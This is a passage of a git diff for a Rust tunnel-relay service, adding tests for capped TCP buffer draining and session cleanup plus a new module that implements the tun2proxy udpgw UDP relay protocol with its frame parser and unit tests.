+        // `TCP_DRAIN_MAX_BYTES` and keep the overflow queued, so the next
+        // poll picks it up instead of one oversized response being built.
+        const TAIL: usize = 4096;
+        let inner = fake_inner().await;
+        inner.read_buf.lock().await.resize(TCP_DRAIN_MAX_BYTES + TAIL, 0xab);
+
+        let (head, head_eof) = drain_now(&inner, usize::MAX).await;
+        assert_eq!(head.len(), TCP_DRAIN_MAX_BYTES);
+        assert!(!head_eof, "shouldn't propagate eof while buffer still has data");
+
+        // Exactly the overflow is left behind by the capped drain.
+        assert_eq!(inner.read_buf.lock().await.len(), TAIL);
+
+        let (rest, _) = drain_now(&inner, usize::MAX).await;
+        assert_eq!(rest.len(), TAIL);
+        assert!(inner.read_buf.lock().await.is_empty());
+    }
+
+    #[tokio::test]
+    async fn drain_now_respects_caller_budget_below_per_session_cap() {
+        // Regression for issue #863: the per-session `TCP_DRAIN_MAX_BYTES`
+        // cap does not bound the sum over many sessions, so the batch loop
+        // also passes the budget still left for the whole response.
+        // `drain_now` has to honor `min(budget, TCP_DRAIN_MAX_BYTES)` and
+        // keep the rest buffered for the next poll, exactly as it does on
+        // the per-session cap path.
+        const KIB: usize = 1024;
+        let buffered = 1024 * KIB;
+        let budget = 256 * KIB;
+
+        // Queue 1 MiB while the caller can only take 256 KiB.
+        let inner = fake_inner().await;
+        inner.read_buf.lock().await.resize(buffered, 0xcd);
+
+        let (taken, eof) = drain_now(&inner, budget).await;
+        assert_eq!(taken.len(), budget);
+        assert!(!eof, "tail still buffered, eof must wait");
+
+        // The 768 KiB beyond the budget has not moved.
+        assert_eq!(inner.read_buf.lock().await.len(), buffered - budget);
+
+        // An unrestricted follow-up call collects the remainder.
+        let (remainder, _) = drain_now(&inner, usize::MAX).await;
+        assert_eq!(remainder.len(), buffered - budget);
+        assert!(inner.read_buf.lock().await.is_empty());
+    }
+
+    #[tokio::test]
+    async fn drain_now_passes_through_when_under_cap() {
+        // Below the cap the whole buffer comes back in one drain, without eof.
+        let inner = fake_inner().await;
+        inner.read_buf.lock().await.extend_from_slice(b"hello world");
+        let (data, eof) = drain_now(&inner, usize::MAX).await;
+        assert_eq!(data, b"hello world");
+        assert!(!eof);
+        assert!(inner.read_buf.lock().await.is_empty());
+    }
+
+    #[tokio::test]
+    async fn drain_now_holds_eof_until_buffer_drained() {
+        // Upstream is already closed while more than one drain's worth of
+        // data is queued: the capped drain has to report eof=false, and
+        // only the drain that empties the buffer may surface eof.
+        const OVERFLOW: usize = 100;
+        let inner = fake_inner().await;
+        {
+            let mut queued = inner.read_buf.lock().await;
+            queued.resize(TCP_DRAIN_MAX_BYTES + OVERFLOW, 0);
+        }
+        inner.eof.store(true, Ordering::Release);
+
+        let (first, first_eof) = drain_now(&inner, usize::MAX).await;
+        assert_eq!(first.len(), TCP_DRAIN_MAX_BYTES);
+        assert!(!first_eof, "premature eof would tear the session");
+
+        let (last, last_eof) = drain_now(&inner, usize::MAX).await;
+        assert_eq!(last.len(), OVERFLOW);
+        assert!(last_eof, "eof finally flips when buffer is drained");
+    }
+
     #[tokio::test]
     async fn wait_for_any_drainable_returns_immediately_when_buffer_has_data() {
         let inner = fake_inner().await;
@@ -1597,11 +2062,13 @@ mod tests {
         let stream = TcpStream::connect(addr).await.unwrap();
         let (reader, writer) = stream.into_split();
         let inner = Arc::new(SessionInner {
-            writer: Mutex::new(writer),
+            writer: Mutex::new(SessionWriter::Tcp(writer)),
             read_buf: Mutex::new(Vec::new()),
             eof: AtomicBool::new(false),
             last_active: Mutex::new(Instant::now()),
             notify: Notify::new(),
+            next_write_seq: Mutex::new(None),
+            pending_writes: Mutex::new(std::collections::BTreeMap::new()),
         });
         let _reader_handle = tokio::spawn(reader_task(reader, inner.clone()));
 
@@ -1958,7 +2425,7 @@ mod tests {
         );
 
         // The `udp_drain_response` helper threads eof into `eof: Some(true)`.
-        let resp = udp_drain_response("zombie".into(), pkts, eof);
+        let resp = udp_drain_response("zombie".into(), pkts, eof, None);
         assert_eq!(resp.eof, Some(true));
         assert!(resp.pkts.is_none());
     }
@@ -1989,4 +2456,151 @@ mod tests {
         assert_eq!(r.len(), 1);
         assert_eq!(r[0]["eof"], serde_json::Value::Bool(true));
     }
+
+    /// Regression for the cleanup-correctness fix. The batch handler
+    /// used to reap every session whose `inner.eof` atomic was set,
+    /// even when `drain_now` had withheld eof because the buffer was
+    /// larger than `TCP_DRAIN_MAX_BYTES` and a tail was still queued.
+    /// Reaping aborted the reader_task and dropped that tail. Cleanup
+    /// is now driven off the `eof` value the drain returns, so an
+    /// over-cap buffer + atomic eof survives the first poll and the
+    /// session is reaped only by the drain that actually returns eof.
+    #[tokio::test]
+    async fn batch_keeps_over_cap_session_until_tail_is_drained() {
+        use axum::body::Bytes;
+        use axum::extract::State;
+
+        let state = fresh_state();
+        let inner = fake_inner().await;
+        // Prime an over-cap buffer + raw eof. drain_now is expected to
+        // return TCP_DRAIN_MAX_BYTES bytes with eof=false; the previous
+        // cleanup would still reap because it read inner.eof directly.
+        inner
+            .read_buf
+            .lock()
+            .await
+            .resize(TCP_DRAIN_MAX_BYTES + 4096, 0u8);
+        inner.eof.store(true, Ordering::Release);
+
+        let sid = "over-cap-sid".to_string();
+        state.sessions.lock().await.insert(
+            sid.clone(),
+            ManagedSession {
+                inner: inner.clone(),
+                reader_handle: tokio::spawn(async {}),
+                udpgw_handle: None,
+            },
+        );
+
+        let body = serde_json::json!({
+            "k": "test-key",
+            "ops": [{"op": "data", "sid": &sid}]
+        })
+        .to_string();
+        let _resp = handle_batch(State(state.clone()), Bytes::from(body))
+            .await
+            .into_response();
+
+        // First poll: the session must still be in the map with its tail
+        // intact. The map guard lives only inside this block.
+        {
+            let sessions = state.sessions.lock().await;
+            let s = sessions.get(&sid).expect(
+                "session removed despite tail bytes still buffered; \
+                 drain_now returned eof=false but cleanup ignored that \
+                 and read inner.eof directly",
+            );
+            let remaining = s.inner.read_buf.lock().await.len();
+            assert_eq!(remaining, 4096, "tail must be preserved for next drain");
+        }
+
+        // Second poll: the remaining 4096 bytes fit under the cap and the
+        // eof atomic is set, so this drain reports eof and cleanup reaps.
+        let body2 = serde_json::json!({
+            "k": "test-key",
+            "ops": [{"op": "data", "sid": &sid}]
+        })
+        .to_string();
+        let _resp2 = handle_batch(State(state.clone()), Bytes::from(body2))
+            .await
+            .into_response();
+
+        assert!(
+            !state.sessions.lock().await.contains_key(&sid),
+            "session should be reaped on the drain that returns eof=true",
+        );
+    }
+
+    /// Regression for the `tokio::join!` → `tokio::select!` mixed-drain
+    /// fix. Before the change, a TCP-ready / UDP-idle pure-poll batch
+    /// paid the full UDP `LONGPOLL_DEADLINE` (15 s) because the join
+    /// was conjunctive — both arms had to complete. Under select! the
+    /// TCP wake returns the response promptly even though UDP is
+    /// quiet. The bound is loose (1 s) on purpose: a healthy run should
+    /// finish far below it, while the prior bug would have blocked for
+    /// the whole deadline before failing (or hit a harness timeout).
+    #[tokio::test]
+    async fn batch_tcp_ready_does_not_pay_udp_longpoll_deadline() {
+        use axum::body::Bytes;
+        use axum::extract::State;
+
+        let state = fresh_state();
+
+        // TCP session with bytes already buffered → immediately drainable.
+        let tcp_inner = fake_inner().await;
+        tcp_inner
+            .read_buf
+            .lock()
+            .await
+            .extend_from_slice(b"ready");
+        let tcp_sid = "tcp-sid".to_string();
+        state.sessions.lock().await.insert(
+            tcp_sid.clone(),
+            ManagedSession {
+                inner: tcp_inner,
+                reader_handle: tokio::spawn(async {}),
+                udpgw_handle: None,
+            },
+        );
+
+        // Idle UDP session: the target socket is bound locally so the
+        // open succeeds, but this test never sends a datagram through it.
+        let udp_target = UdpSocket::bind(("127.0.0.1", 0)).await.unwrap();
+        let udp_port = udp_target.local_addr().unwrap().port();
+        let (udp_sid, _udp_inner) = handle_udp_open_phase1(
+            &state,
+            Some("127.0.0.1".into()),
+            Some(udp_port),
+            None,
+        )
+        .await
+        .expect("udp open");
+
+        // Pure-poll batch (no `d` payload) → had_writes_or_connects =
+        // false → deadline = LONGPOLL_DEADLINE (15 s). Under the
+        // previous tokio::join! wait, the UDP arm would have held the
+        // response open for the full window even though TCP was
+        // already drainable.
+        let body = serde_json::json!({
+            "k": "test-key",
+            "ops": [
+                {"op": "data", "sid": &tcp_sid},
+                {"op": "udp_data", "sid": &udp_sid},
+            ]
+        })
+        .to_string();
+
+        let t0 = Instant::now();
+        let _resp = handle_batch(State(state.clone()), Bytes::from(body))
+            .await
+            .into_response();
+        let elapsed = t0.elapsed();
+
+        assert!(
+            elapsed < Duration::from_secs(1),
+            "TCP-ready / UDP-idle pure-poll batch must not pay \
+             LONGPOLL_DEADLINE; elapsed={:?}",
+            elapsed,
+        );
+    }
 }
diff --git a/tunnel-node/src/udpgw.rs b/tunnel-node/src/udpgw.rs
new file mode 100644
index 00000000..6e9a0b31
--- /dev/null
+++ b/tunnel-node/src/udpgw.rs
@@ -0,0 +1,566 @@
+//! Native implementation of the tun2proxy udpgw wire protocol.
+//!
+//! Wire format (all fields big-endian):
+//! ```text
+//! +-----+-------+---------+------+----------+----------+----------+
+//! | LEN | FLAGS | CONN_ID | ATYP | DST.ADDR | DST.PORT |   DATA   |
+//! +-----+-------+---------+------+----------+----------+----------+
+//! |  2  |   1   |    2    |  1   | Variable |    2     | Variable |
+//! +-----+-------+---------+------+----------+----------+----------+
+//! ```
+//!
+//! Flags: KEEPALIVE=0x01, DATA=0x02, ERR=0x20
+//! ATYP: 0x01=IPv4(4B), 0x03=Domain(1B len + name), 0x04=IPv6(16B)
+
+use std::net::{Ipv4Addr, Ipv6Addr, SocketAddr, SocketAddrV4, SocketAddrV6};
+use std::sync::Arc;
+
+use tokio::io::{AsyncReadExt, AsyncWriteExt, DuplexStream};
+use tokio::net::UdpSocket;
+
+/// Magic address that the client connects to via the tunnel protocol.
+/// `192.0.2.0/24` is reserved for documentation (RFC 5737 TEST-NET-1)
+/// and will never be a real destination.
+///
+/// Must NOT live in `198.18.0.0/15`: tun2proxy's `--dns virtual` allocator
+/// (used by the Android client in Full mode) synthesises fake IPs in that
+/// range for hostname lookups. If the magic IP collided with one of those
+/// synthetic IPs, every request to whichever hostname got that allocation
+/// would be silently mis-routed into the udpgw path. See issue #251.
+pub const UDPGW_MAGIC_IP: [u8; 4] = [192, 0, 2, 1];
+/// Pre-formatted dotted-quad form of `UDPGW_MAGIC_IP`. Compared against
+/// incoming hostnames in [`is_udpgw_dest`]; kept in sync with the octets
+/// above by the `magic_host_matches_octets` test.
+pub const UDPGW_MAGIC_HOST: &str = "192.0.2.1";
+pub const UDPGW_MAGIC_PORT: u16 = 7300;
+
+/// Pre-#251 magic IP — still recognised by `is_udpgw_dest` for one
+/// deprecation cycle so users who upgrade the `mhrv-tunnel` Docker
+/// container ahead of the Android APK don't lose Full-mode UDP relay
+/// during the version-skew window. Slated for removal in v1.10.0.
+const LEGACY_UDPGW_MAGIC_IP: [u8; 4] = [198, 18, 0, 1];
+const LEGACY_UDPGW_MAGIC_HOST: &str = "198.18.0.1";
+
+const FLAG_KEEPALIVE: u8 = 0x01;
+const FLAG_DATA: u8 = 0x02;
+const FLAG_ERR: u8 = 0x20;
+
+const ATYP_IPV4: u8 = 0x01;
+const ATYP_DOMAIN: u8 = 0x03;
+const ATYP_IPV6: u8 = 0x04;
+
+/// Maximum UDP payload we'll handle.
+const UDP_MTU: usize = 10240;
+
+// -------------------------------------------------------------------------
+// Frame types
+// -------------------------------------------------------------------------
+
+#[derive(Debug, Clone)]
+enum DstAddr { // destination carried by a DATA frame; the `u16` in each variant is the port
+    V4(Ipv4Addr, u16), // ATYP_IPV4: 4-byte address on the wire
+    V6(Ipv6Addr, u16), // ATYP_IPV6: 16-byte address on the wire
+    Domain(String, u16), // ATYP_DOMAIN: host name sent behind a 1-byte length prefix
+}
+
+impl DstAddr {
+    /// Resolve to a `SocketAddr` (first result for `Domain`). NOTE(review): that lookup may block the thread.
+    fn to_socket_addr(&self) -> std::io::Result<SocketAddr> {
+        match self {
+            DstAddr::V4(ip, port) => Ok(SocketAddr::V4(SocketAddrV4::new(*ip, *port))),
+            DstAddr::V6(ip, port) => Ok(SocketAddr::V6(SocketAddrV6::new(*ip, *port, 0, 0))),
+            DstAddr::Domain(name, port) => {
+                use std::net::ToSocketAddrs;
+                let first = (name.as_str(), *port).to_socket_addrs()?.next();
+                first.ok_or_else(|| std::io::Error::new(std::io::ErrorKind::AddrNotAvailable, "DNS resolution failed"))
+            }
+        }
+    }
+
+    /// Serialise into SOCKS5 address format: ATYP + addr + port (domain capped at 255 bytes).
+    fn write_to(&self, buf: &mut Vec<u8>) {
+        match self {
+            DstAddr::V4(ip, port) => {
+                buf.push(ATYP_IPV4);
+                buf.extend_from_slice(&ip.octets());
+                buf.extend_from_slice(&port.to_be_bytes());
+            }
+            DstAddr::V6(ip, port) => {
+                buf.push(ATYP_IPV6);
+                buf.extend_from_slice(&ip.octets());
+                buf.extend_from_slice(&port.to_be_bytes());
+            }
+            DstAddr::Domain(name, port) => {
+                // One length byte on the wire: cap at 255 so the prefix always matches the bytes written.
+                let name = &name.as_bytes()[..name.len().min(usize::from(u8::MAX))];
+                buf.extend_from_slice(&[ATYP_DOMAIN, name.len() as u8]);
+                buf.extend_from_slice(name);
+                buf.extend_from_slice(&port.to_be_bytes());
+            }
+        }
+    }
+
+    fn serialised_len(&self) -> usize { // must equal the byte count `write_to` appends
+        match self {
+            DstAddr::V4(..) => 1 + 4 + 2,       // ATYP + IPv4 + port
+            DstAddr::V6(..) => 1 + 16 + 2,       // ATYP + IPv6 + port
+            DstAddr::Domain(n, _) => 1 + 1 + n.len().min(usize::from(u8::MAX)) + 2, // ATYP + len + capped name + port
+        }
+    }
+}
+
+#[derive(Debug)]
+struct Frame { // one decoded udpgw frame, i.e. the body that follows the 2-byte LEN prefix
+    flags: u8, // bit set; see FLAG_KEEPALIVE / FLAG_DATA / FLAG_ERR
+    conn_id: u16, // CONN_ID field, big-endian on the wire
+    addr: Option<DstAddr>, // parsed only when FLAG_DATA is set, otherwise `None`
+    payload: Vec<u8>, // bytes left in the body after the optional address
+}
+
+// -------------------------------------------------------------------------
+// Parse / serialise
+// -------------------------------------------------------------------------
+
+/// Decode one udpgw frame from the front of `buf`.
+///
+/// Yields `Ok(None)` while the length prefix or the body is still incomplete,
+/// `Ok(Some((frame, consumed)))` for a whole frame (`consumed` includes the
+/// 2-byte length prefix), and `Err(InvalidData)` for a malformed body.
+fn try_parse_frame(buf: &[u8]) -> Result<Option<(Frame, usize)>, std::io::Error> {
+    // Every malformed-frame error shares the same kind; only the text differs.
+    let invalid = |msg: &str| std::io::Error::new(std::io::ErrorKind::InvalidData, msg);
+
+    // LEN prefix: big-endian u16 counting the bytes that follow it.
+    let total = match buf {
+        [hi, lo, ..] => 2 + usize::from(u16::from_be_bytes([*hi, *lo])),
+        _ => return Ok(None),
+    };
+    if buf.len() < total {
+        return Ok(None);
+    }
+
+    // Fixed part of the body: FLAGS(1) + CONN_ID(2); `rest` is what follows.
+    let (flags, conn_id, rest) = match &buf[2..total] {
+        [flags, id_hi, id_lo, rest @ ..] => (*flags, u16::from_be_bytes([*id_hi, *id_lo]), rest),
+        _ => return Err(invalid("frame too short")),
+    };
+
+    let (addr, payload_start) = if flags & FLAG_DATA == 0 {
+        (None, 0)
+    } else {
+        // DATA frames put a SOCKS5-style address in front of the payload.
+        match rest.first().copied() {
+            None => return Err(invalid("missing ATYP")),
+            Some(ATYP_IPV4) => {
+                if rest.len() < 1 + 4 + 2 {
+                    return Err(invalid("short IPv4 addr"));
+                }
+                let ip = Ipv4Addr::new(rest[1], rest[2], rest[3], rest[4]);
+                let port = u16::from_be_bytes([rest[5], rest[6]]);
+                (Some(DstAddr::V4(ip, port)), 7)
+            }
+            Some(ATYP_IPV6) => {
+                if rest.len() < 1 + 16 + 2 {
+                    return Err(invalid("short IPv6 addr"));
+                }
+                let mut raw = [0u8; 16];
+                raw.copy_from_slice(&rest[1..17]);
+                let port = u16::from_be_bytes([rest[17], rest[18]]);
+                (Some(DstAddr::V6(Ipv6Addr::from(raw), port)), 19)
+            }
+            Some(ATYP_DOMAIN) => {
+                let dlen = match rest.get(1) {
+                    Some(&len) => usize::from(len),
+                    None => return Err(invalid("short domain addr")),
+                };
+                let end = 2 + dlen;
+                if rest.len() < end + 2 {
+                    return Err(invalid("short domain addr"));
+                }
+                let name = String::from_utf8_lossy(&rest[2..end]).into_owned();
+                let port = u16::from_be_bytes([rest[end], rest[end + 1]]);
+                (Some(DstAddr::Domain(name, port)), end + 2)
+            }
+            Some(other) => return Err(invalid(&format!("unknown ATYP 0x{:02x}", other))),
+        }
+    };
+
+    // Whatever follows the optional address is the datagram payload.
+    let payload = rest[payload_start..].to_vec();
+
+    Ok(Some((Frame { flags, conn_id, addr, payload }, total)))
+}
+
+fn serialise_frame(frame: &Frame) -> Vec<u8> {
+    // Body = flags(1) + conn_id(2) + [addr] + payload. LEN is only 16 bits, so an
+    // oversized payload is clamped: a wrapped LEN would desync every later frame.
+    let addr_len = frame.addr.as_ref().map_or(0, |a| a.serialised_len());
+    let room = usize::from(u16::MAX).saturating_sub(1 + 2 + addr_len);
+    let payload = &frame.payload[..frame.payload.len().min(room)];
+    let body_len = 1 + 2 + addr_len + payload.len();
+    let mut buf = Vec::with_capacity(2 + body_len);
+    buf.extend_from_slice(&(body_len as u16).to_be_bytes());
+    buf.push(frame.flags);
+    buf.extend_from_slice(&frame.conn_id.to_be_bytes());
+    frame.addr.iter().for_each(|addr| addr.write_to(&mut buf));
+    buf.extend_from_slice(payload);
+    buf
+}
+
+// -------------------------------------------------------------------------
+// Public API
+// -------------------------------------------------------------------------
+
+/// Reports whether a connect destination is the magic udpgw address.
+///
+/// The port must equal `UDPGW_MAGIC_PORT` and the host must be either the
+/// current `UDPGW_MAGIC_HOST` (`192.0.2.1`) or `LEGACY_UDPGW_MAGIC_HOST`
+/// (`198.18.0.1`), which pre-#251 Android clients still send.
+pub fn is_udpgw_dest(host: &str, port: u16) -> bool {
+    port == UDPGW_MAGIC_PORT && matches!(host, UDPGW_MAGIC_HOST | LEGACY_UDPGW_MAGIC_HOST)
+}
+
+/// Persistent UDP socket for one `(conn_id, dest_addr)` key, paired with the
+/// handle of the background reader that receives datagrams and queues response frames.
+struct ConnSocket {
+    sock: Arc<UdpSocket>, // shared handle; `get_or_create_socket` hands out clones of it
+    _reader: tokio::task::AbortHandle, // NOTE(review): tokio does not abort on handle drop — confirm teardown calls `abort()`
+}
+
+/// Run the udpgw server over a duplex stream: read udpgw frames from the client
+/// half, relay them as real UDP datagrams, and write response frames back.
+/// Sockets persist per (conn_id, dest_addr) so peers that expect a stable source
+/// port (e.g. Telegram VoIP) keep working; their readers are aborted on exit.
+pub async fn udpgw_server_task(stream: DuplexStream) {
+    let (tx, mut rx) = tokio::sync::mpsc::channel::<Vec<u8>>(256);
+
+    // Writer task: drains response channel → duplex stream.
+    let mut read_half = {
+        let (read_half, write_half) = tokio::io::split(stream);
+        tokio::spawn(async move {
+            let mut w = write_half;
+            while let Some(data) = rx.recv().await {
+                if w.write_all(&data).await.is_err() {
+                    break;
+                }
+                let _ = w.flush().await;
+            }
+        });
+        read_half
+    };
+
+    // Persistent sockets keyed by (conn_id, dest_addr).
+    let mut sockets: std::collections::HashMap<(u16, SocketAddr), ConnSocket> = std::collections::HashMap::new();
+
+    let mut buf = Vec::with_capacity(65536);
+    let mut tmp = [0u8; 65536];
+
+    loop {
+        let n = match read_half.read(&mut tmp).await {
+            Ok(0) | Err(_) => break,
+            Ok(n) => n,
+        };
+        buf.extend_from_slice(&tmp[..n]);
+
+        loop {
+            match try_parse_frame(&buf) {
+                Ok(Some((frame, consumed))) => {
+                    buf.drain(..consumed);
+                    handle_frame(&frame, &tx, &mut sockets).await;
+                }
+                Ok(None) => break,
+                Err(e) => {
+                    // Drop only the bad frame and keep parsing what is already buffered behind it.
+                    tracing::warn!("udpgw frame parse error: {}", e);
+                    if buf.len() < 2 {
+                        buf.clear();
+                        break;
+                    }
+                    let skip = 2 + u16::from_be_bytes([buf[0], buf[1]]) as usize;
+                    buf.drain(..skip.min(buf.len()));
+                }
+            }
+        }
+    }
+
+    // Dropping a tokio `AbortHandle` does not cancel its task, so abort each reader here.
+    sockets.values().for_each(|cs| cs._reader.abort());
+    tracing::debug!("udpgw session ended");
+}
+
+/// Spawn the background reader for `sock`.
+///
+/// Every datagram received is wrapped in a DATA frame carrying `conn_id` and
+/// `addr` and queued on `tx`. The task ends when `recv` fails or when the
+/// response channel is closed. Returns the task's abort handle.
+fn spawn_udp_reader(
+    sock: Arc<UdpSocket>,
+    conn_id: u16,
+    addr: DstAddr,
+    tx: tokio::sync::mpsc::Sender<Vec<u8>>,
+) -> tokio::task::AbortHandle {
+    tokio::spawn(async move {
+        let mut recv_buf = vec![0u8; UDP_MTU];
+        loop {
+            let n = match sock.recv(&mut recv_buf).await {
+                Ok(n) => n,
+                Err(e) => {
+                    tracing::debug!("udpgw recv for conn {} failed: {}", conn_id, e);
+                    break;
+                }
+            };
+            let resp = serialise_frame(&Frame {
+                flags: FLAG_DATA,
+                conn_id,
+                addr: Some(addr.clone()),
+                payload: recv_buf[..n].to_vec(),
+            });
+            if tx.send(resp).await.is_err() {
+                break;
+            }
+        }
+    })
+    .abort_handle()
+}
+
+/// Get or create the persistent UDP socket for this (conn_id, dest_addr) pair.
+///
+/// A background reader task continuously receives datagrams on the socket
+/// and queues response frames on `tx` — no per-packet timeout needed.
+///
+/// * `conn_id` / `dst` — together form the key into `sockets`.
+/// * `addr` — destination as sent by the client; echoed in response frames.
+/// * `tx` — response channel handed to the reader task.
+///
+/// If a cached socket's reader has already exited (for example after a
+/// `recv` error), a new reader is started on the same socket so replies keep
+/// flowing and the local source port stays unchanged.
+///
+/// Returns `None` when binding or connecting a new socket fails.
+async fn get_or_create_socket(
+    conn_id: u16,
+    dst: &SocketAddr,
+    addr: &DstAddr,
+    tx: &tokio::sync::mpsc::Sender<Vec<u8>>,
+    sockets: &mut std::collections::HashMap<(u16, SocketAddr), ConnSocket>,
+) -> Option<Arc<UdpSocket>> {
+    let key = (conn_id, *dst);
+    if let Some(cs) = sockets.get_mut(&key) {
+        if cs._reader.is_finished() {
+            // Without a reader, responses on this socket would be lost.
+            cs._reader = spawn_udp_reader(cs.sock.clone(), conn_id, addr.clone(), tx.clone());
+        }
+        return Some(cs.sock.clone());
+    }
+
+    // Wildcard address of the destination's family, ephemeral port.
+    let bind_addr = if dst.is_ipv6() {
+        SocketAddr::from(([0u16; 8], 0)) // [::]:0
+    } else {
+        SocketAddr::from(([0u8; 4], 0)) // 0.0.0.0:0
+    };
+    let sock = match UdpSocket::bind(bind_addr).await {
+        Ok(s) => Arc::new(s),
+        Err(e) => {
+            tracing::debug!("udpgw bind failed: {}", e);
+            return None;
+        }
+    };
+    if let Err(e) = sock.connect(dst).await {
+        tracing::debug!("udpgw connect {} failed: {}", dst, e);
+        return None;
+    }
+
+    // Spawn continuous reader for this socket.
+    let reader = spawn_udp_reader(sock.clone(), conn_id, addr.clone(), tx.clone());
+
+    sockets.insert(key, ConnSocket { sock: sock.clone(), _reader: reader });
+    Some(sock)
+}
+
+/// Process one frame received from the client.
+///
+/// * KEEPALIVE frames are echoed back with the same `conn_id`.
+/// * Frames without the DATA flag are ignored.
+/// * DATA frames are sent to their destination through the persistent
+///   socket for `(conn_id, destination)`; the reply arrives asynchronously
+///   via that socket's reader task.
+///
+/// Any failure on the DATA path (missing address, blocked port, resolve
+/// failure, socket setup failure, send failure) is reported to the client
+/// as one ERR frame. Failures to queue a frame on `tx` are ignored.
+async fn handle_frame(
+    frame: &Frame,
+    tx: &tokio::sync::mpsc::Sender<Vec<u8>>,
+    sockets: &mut std::collections::HashMap<(u16, SocketAddr), ConnSocket>,
+) {
+    if (frame.flags & FLAG_KEEPALIVE) != 0 {
+        let echo = Frame {
+            flags: FLAG_KEEPALIVE,
+            conn_id: frame.conn_id,
+            addr: None,
+            payload: Vec::new(),
+        };
+        let _ = tx.send(serialise_frame(&echo)).await;
+        return;
+    }
+
+    if (frame.flags & FLAG_DATA) == 0 {
+        return;
+    }
+
+    // `true` once the datagram has been handed to the socket; every early
+    // exit yields `false` and is answered with one ERR frame below.
+    let forwarded = 'forward: {
+        let Some(target) = frame.addr.as_ref() else {
+            break 'forward false;
+        };
+
+        // Block QUIC (UDP 443) and DNS (UDP 53) from udpgw:
+        // - QUIC: forces browsers to fall back to TCP/HTTP2 which is much
+        //   faster through the batch tunnel pipeline.
+        // - DNS: let tun2proxy's virtual DNS / SOCKS5 UDP associate handle
+        //   it instead — more reliable on the per-session path.
+        // VoIP (Telegram, Meet) still flows through udpgw normally.
+        let port = match target {
+            DstAddr::V4(_, p) | DstAddr::V6(_, p) | DstAddr::Domain(_, p) => *p,
+        };
+        if matches!(port, 443 | 53) {
+            break 'forward false;
+        }
+
+        let resolved = match target.to_socket_addr() {
+            Ok(a) => a,
+            Err(e) => {
+                tracing::debug!("udpgw resolve failed: {}", e);
+                break 'forward false;
+            }
+        };
+
+        let Some(sock) =
+            get_or_create_socket(frame.conn_id, &resolved, target, tx, sockets).await
+        else {
+            break 'forward false;
+        };
+
+        // Send the datagram. Response comes asynchronously via the reader task.
+        match sock.send(&frame.payload).await {
+            Ok(_) => true,
+            Err(e) => {
+                tracing::debug!("udpgw send to {} failed: {}", resolved, e);
+                false
+            }
+        }
+    };
+
+    if !forwarded {
+        let _ = tx.send(serialise_err(frame.conn_id)).await;
+    }
+}
+
+/// Serialise an ERR frame for `conn_id`: `FLAG_ERR` set, no address, empty
+/// payload.
+fn serialise_err(conn_id: u16) -> Vec<u8> {
+    let err_frame = Frame {
+        flags: FLAG_ERR,
+        conn_id,
+        addr: None,
+        payload: Vec::new(),
+    };
+    serialise_frame(&err_frame)
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    /// Parse one complete frame from the front of `bytes`, panicking if the
+    /// parser errors or reports an incomplete frame. Returns the frame and
+    /// the number of bytes it consumed.
+    fn parse_one(bytes: &[u8]) -> (Frame, usize) {
+        try_parse_frame(bytes).unwrap().unwrap()
+    }
+
+    /// Serialise a keepalive frame (no address, empty payload) for `conn_id`.
+    fn keepalive_bytes(conn_id: u16) -> Vec<u8> {
+        serialise_frame(&Frame { flags: FLAG_KEEPALIVE, conn_id, addr: None, payload: vec![] })
+    }
+
+    /// Serialise a DATA frame with the given connection id, address and payload.
+    fn data_bytes(conn_id: u16, addr: DstAddr, payload: &[u8]) -> Vec<u8> {
+        serialise_frame(&Frame {
+            flags: FLAG_DATA,
+            conn_id,
+            addr: Some(addr),
+            payload: payload.to_vec(),
+        })
+    }
+
+    #[test]
+    fn keepalive_round_trip() {
+        let wire = keepalive_bytes(42);
+        let (decoded, used) = parse_one(&wire);
+        assert_eq!(used, wire.len());
+        assert_eq!(decoded.flags, FLAG_KEEPALIVE);
+        assert_eq!(decoded.conn_id, 42);
+        assert!(decoded.addr.is_none());
+        assert!(decoded.payload.is_empty());
+    }
+
+    #[test]
+    fn data_ipv4_round_trip() {
+        let wire = data_bytes(7, DstAddr::V4(Ipv4Addr::new(8, 8, 8, 8), 53), &[1, 2, 3, 4]);
+        let (decoded, used) = parse_one(&wire);
+        assert_eq!(used, wire.len());
+        assert_eq!(decoded.flags, FLAG_DATA);
+        assert_eq!(decoded.conn_id, 7);
+        assert_eq!(decoded.payload, vec![1, 2, 3, 4]);
+        let DstAddr::V4(ip, port) = decoded.addr.unwrap() else {
+            panic!("expected IPv4");
+        };
+        assert_eq!(ip, Ipv4Addr::new(8, 8, 8, 8));
+        assert_eq!(port, 53);
+    }
+
+    #[test]
+    fn data_ipv6_round_trip() {
+        let wire = data_bytes(100, DstAddr::V6(Ipv6Addr::LOCALHOST, 443), b"hello");
+        let (decoded, _) = parse_one(&wire);
+        assert_eq!(decoded.conn_id, 100);
+        let DstAddr::V6(ip, port) = decoded.addr.unwrap() else {
+            panic!("expected IPv6");
+        };
+        assert_eq!(ip, Ipv6Addr::LOCALHOST);
+        assert_eq!(port, 443);
+    }
+
+    #[test]
+    fn data_domain_round_trip() {
+        let wire = data_bytes(5, DstAddr::Domain("example.com".into(), 80), b"GET /");
+        let (decoded, _) = parse_one(&wire);
+        let DstAddr::Domain(name, port) = decoded.addr.unwrap() else {
+            panic!("expected Domain");
+        };
+        assert_eq!(name, "example.com");
+        assert_eq!(port, 80);
+    }
+
+    #[test]
+    fn err_frame_round_trip() {
+        let (decoded, _) = parse_one(&serialise_err(99));
+        assert_eq!(decoded.flags, FLAG_ERR);
+        assert_eq!(decoded.conn_id, 99);
+    }
+
+    #[test]
+    fn partial_frame_returns_none() {
+        let wire = keepalive_bytes(1);
+        // Only the first half of the frame is available: the parser must ask
+        // for more data rather than fail.
+        let half = &wire[..wire.len() / 2];
+        assert!(try_parse_frame(half).unwrap().is_none());
+    }
+
+    #[test]
+    fn two_frames_in_buffer() {
+        // Two keepalives back to back, as they would sit in the read buffer.
+        let mut stream = keepalive_bytes(1);
+        stream.extend_from_slice(&keepalive_bytes(2));
+
+        let (first, offset) = parse_one(&stream);
+        assert_eq!(first.conn_id, 1);
+        let (second, _) = parse_one(&stream[offset..]);
+        assert_eq!(second.conn_id, 2);
+    }
+
+    #[test]
+    fn is_udpgw_dest_works() {
+        // "192.0.2.1" is the current magic IP. "198.18.0.1" is the legacy
+        // pre-#251 magic IP, still recognised for one deprecation cycle so old
+        // Android clients keep working against a new tunnel-node. Remove the
+        // legacy entry (and `LEGACY_UDPGW_MAGIC_IP`) in v1.10.0.
+        for host in ["192.0.2.1", "198.18.0.1"] {
+            assert!(is_udpgw_dest(host, 7300));
+            // Wrong port on either IP must not match.
